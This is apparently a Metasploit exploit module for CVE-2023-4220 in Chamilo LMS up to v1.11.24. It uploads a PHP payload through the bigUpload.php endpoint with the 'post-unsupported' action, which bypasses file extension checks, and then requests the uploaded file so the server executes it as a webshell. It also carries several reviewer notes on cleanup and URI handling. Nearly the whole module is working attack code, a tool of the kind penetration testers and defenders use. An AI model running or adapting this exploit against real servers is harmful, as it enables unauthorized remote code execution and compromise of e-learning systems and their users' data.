Path: blob/master/modules/exploits/linux/http/chamilo_bigupload_webshell.rb
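##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Raised by upload_file when the target does not acknowledge the upload.
  class UploadFileError < StandardError; end

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chamilo v1.11.24 Unrestricted File Upload PHP Webshell',
        'Description' => %q{
          Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24
          a webshell can be uploaded via the bigUpload.php endpoint. If the GET request parameter `action` is set to
          `post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:
          `/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist
          by default.
        },
        'Author' => [
          'Ngo Wei Lin', # discovery
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://starlabs.sg/advisories/23/23-4220/'],
          [ 'URL', 'https://github.com/H4cking4All/CVE-2023-4220/tree/main'],
          [ 'CVE', '2023-4220']
        ],
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => ['php'],
              'Arch' => ARCH_PHP
            }
          ],
        ],
        'DisclosureDate' => '2023-11-28',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
  end

  # Probes for the writable files directory and then performs a test upload.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the target does not answer the
  #   directory probe, Safe when the directory is absent or the test upload is
  #   rejected, Vulnerable when the target acknowledges the upload.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/files/')
    )

    # A missing response says nothing about the directory, so do not report the
    # target as vulnerable or go on to the upload attempt.
    return CheckCode::Unknown('The target did not respond to the directory probe.') if res.nil?
    return CheckCode::Safe('The directory /main/inc/lib/javascript/bigupload/files/ does not exist on the target') if res.code == 404

    print_good('The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.')

    # NOTE(review): this test upload also leaves an artifact on the target; confirm
    # that register_file_for_cleanup is effective without a session, otherwise the
    # check itself contributes to ARTIFACTS_ON_DISK.
    probe_content = rand_text_alphanumeric(8)
    probe_name = rand_text_alphanumeric(8)

    begin
      upload_file(probe_content, probe_name)
    rescue UploadFileError => e
      return CheckCode::Safe("#{e.class}:#{e}")
    end

    # The advisory referenced above is CVE-2023-4220, matching the References list.
    CheckCode::Vulnerable('File upload was successful (CVE-2023-4220 was exploited successfully).')
  end

  # Uploads +file_contents+ under +file_name+ through bigUpload.php.
  #
  # @param file_contents [String] bytes written to the target
  # @param file_name [String] name the target stores the file under
  # @raise [UploadFileError] unless the target answers 200 with its success string
  # @return [void]
  def upload_file(file_contents, file_name)
    vars_form_data = [
      {
        'name' => 'bigUploadFile',
        'data' => file_contents,
        'filename' => file_name,
        'mime_type' => 'application/octet-stream'
      }
    ]

    # The `action=post-unsupported` query parameter is what bypasses the extension
    # checks; it is also the attribute that distinguishes this traffic from normal
    # bigUpload usage in web-server logs.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/inc/bigUpload.php'),
      'vars_form_data' => vars_form_data,
      'vars_get' => { 'action' => 'post-unsupported' }
    )

    acknowledged = res && res.code == 200 && res.body == 'The file has successfully been uploaded.'
    raise UploadFileError, 'The file upload failed.' unless acknowledged

    # NOTE(review): only the bare file name is registered; confirm FileDropper can
    # resolve it on the target, otherwise the full path under the files directory
    # should be registered instead.
    register_file_for_cleanup(file_name)
  end

  # Uploads the PHP payload and then requests it so the target runs it.
  #
  # @return [void]
  def exploit
    file_contents = payload.encoded
    file_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"

    begin
      upload_file(file_contents, file_name)
    rescue UploadFileError => e
      fail_with(Failure::UnexpectedReply, "#{e.class}:#{e}")
    end

    # NOTE(review): unlike check and upload_file this URI omits target_uri.path, so a
    # non-root TARGETURI is not honoured here -- confirm whether that is intended.
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri('/main/inc/lib/javascript/bigupload/files', file_name)
    )
  end
end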